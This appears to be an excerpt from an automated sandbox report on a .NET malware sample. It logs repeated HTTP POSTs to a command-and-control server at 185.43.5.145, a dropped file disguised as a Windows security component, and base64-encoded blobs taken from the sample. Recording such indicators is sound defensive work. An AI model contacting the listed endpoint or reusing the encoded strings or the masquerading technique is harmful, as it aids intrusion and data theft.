                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1300Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.145
                Source: unknownHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.145
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/
                Source: ArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                System Summary

                barindex
                .NET source code contains very large strings
                Source: ArELGBzuuF.exe, s67.csLong String: Length: 22068
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMPJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 0_2_00007FF848F11EC30_2_00007FF848F11EC3
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 0_2_00007FF848F2AFA20_2_00007FF848F2AFA2
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 0_2_00007FF848F2A1F60_2_00007FF848F2A1F6
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 8_2_00007FF848F11EC38_2_00007FF848F11EC3
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 17_2_00007FF848F11EC317_2_00007FF848F11EC3
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 18_2_00007FF848F41EC318_2_00007FF848F41EC3
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 22_2_00007FF848F11EC322_2_00007FF848F11EC3
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 22_2_00007FF848F106E022_2_00007FF848F106E0
                Source: ArELGBzuuF.exe, 00000000.00000000.2021098488.0000000000582000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ArELGBzuuF.exe
                Source: ArELGBzuuF.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ArELGBzuuF.exe
                Source: ArELGBzuuF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: ArELGBzuuF.exe, E32.csCryptographic APIs: 'TransformBlock'
                Source: ArELGBzuuF.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                Source: ArELGBzuuF.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: 0.2.ArELGBzuuF.exe.2a900d0.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.ArELGBzuuF.exe.2a71550.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.ArELGBzuuF.exe.2a87948.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.ArELGBzuuF.exe.2a67300.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.ArELGBzuuF.exe.e60000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: ArELGBzuuF.exe, s67.csBase64 encoded string: 'H4sIAAAAAAAEAAFkAJv/9a2gs6jIybm0pfmpqK6rqaaywpWbm4mRx8KRhJLNlM6DzYeHgdfQjdSC3t/ZmYbGnODw4/jhgrCqq+rl6JT97/TtlrC+oLH3+vWH6/jh/pu/s5OEwM/GutXF0susioCei82NjJV+m2JkAAAA', 'H4sIAAAAAAAEADSbx5KCaBRG32W2LMhpSc45MyvJGQGJTz/0YrrK1tIu+dP97jnV+u+//8jYpjD//1gIzcVNEBbKWVnkj/z9VqdbWHJ/Ct0Qxt91eFHemCwnNh1xqQPju5A17Q7Hqhf6/hZOH2WZUBTkHBJlqQlluQqvU8qjMHdPtwhcWakXC5sffVawlRricM8q38lwlDpIG3yeAwQfGwH8aP18/S+F4UW5RkiEofmVFk/sGYYP5yqEnXTXdRM1bTZKE1jwRcgAHzu8qSSQwAx7h7Es1sfF3umZVKAZZ5ZnSz7Srhf6nJ0AYa1diub4jyTW81MgWy+yRDZITvotl8TGkAtJNKvK1uPGuZG+GL+BN1FAjLVOGWxFoIzhi/xHLLADPz0dfTbwJNI2oohHY4v+phtdiQFgBy8JRW6npKjriMaWKGZctwzESZsWpulZJkbWVATaOIVyvKZSDiaU38jdu2H64991BveZUEIK1QV7LxTLR1pZ6ms2K3DJpRR5IvcjSGtZ6x+ghgWed/GUATY6pr54SnetULE9atyI0iSD8HpRId8NhHJG95f5ywjEU9eRJ6X8aeLIsK0eIjJIx49JT0QPr2bqNtTIjUj4Y8RR7ZW/9Crvlu5EUtSQOkQlc9V1xI03b/2oWZTG2+dIxSkxEWpBtuhIiykpdpwsTgnvTVIoSClFOHAzh/g3w5gCgdgSHHllVZX9RUzV1J6oMjt+d/pMAijDGM5g1+BLzRmEvU88lobL2nW9zjcBFlosXVsN8+di5YYTziWxci2J4DSyOo+AipXKLZaVhayT+PkPMdoOAnnKwCEp32/4ItvqWoKi7hvtCofIetCJtLrwJyJ95COhHjJHsZ8hHsz9xCwql7CFww6ewg8s69tnHZCfS6jaBHtDti5+XAtU1UJeoCPUnmvpqJ/gDpKmv2Q+Ivr4syj4BbVeUexfYweDMcY+zhp8gKQ3SgcysB52kvSdp8zRdx7mTFhLGx0bdFMN3Cm3GDsIbJLUyizkLCMpmGAoM9M0vofFOh86fJzqbWTwaWFu0yhv7fxc1ZDhNkz93qf6CFn7yMqMJ75DQKc6wdZUvU+IQjNCVVv3+ttkpIKSht2+V5xjVeKtpS5o8PJVo+cBVCzV6ggClgN/rd92vVUmWUuWtlT5qzGrpvk5FrCsFlA6qq+PQ4zrofy8Ecy7qU93YTG1gsVDbLXbipz3oI63QskTmJCl6V87Hc4ca1YjkCaEfrbRab5AWapZc5rmLMBNilOi5f80sQwJ//ED6YYW2cSG0eY6VAN0DYRnZrBysv84HaJY0yXj0YmnAJSkUhXQAEPD6BZoRzlqFhjfMRXiDi0CKWvZk9JEA2v1JYJ3wVYD5U+RnuzHwTIwSVblLxVxGx84/rEuf+vg0ThvSXjkZH212X9kW8Y3EihbUACsKtbeFfF/H+757EcC7TbU1qw323waDUujOTKO+mo66ASANniN85W83Ndwq4eYo08FLeyEtKCSzceNaCzl4rlt35qpbMA95s0JfEiUL6CzdL99bndCR9gsHZ8ljjbxUBM6pbnZFjq/HVULlJiwrVCQqIkvm2v0SiS/lnc7VJt7icspYJ8yPhdRLRZs/dUmHnZpat373ATVgdqoYhu4lzJInqd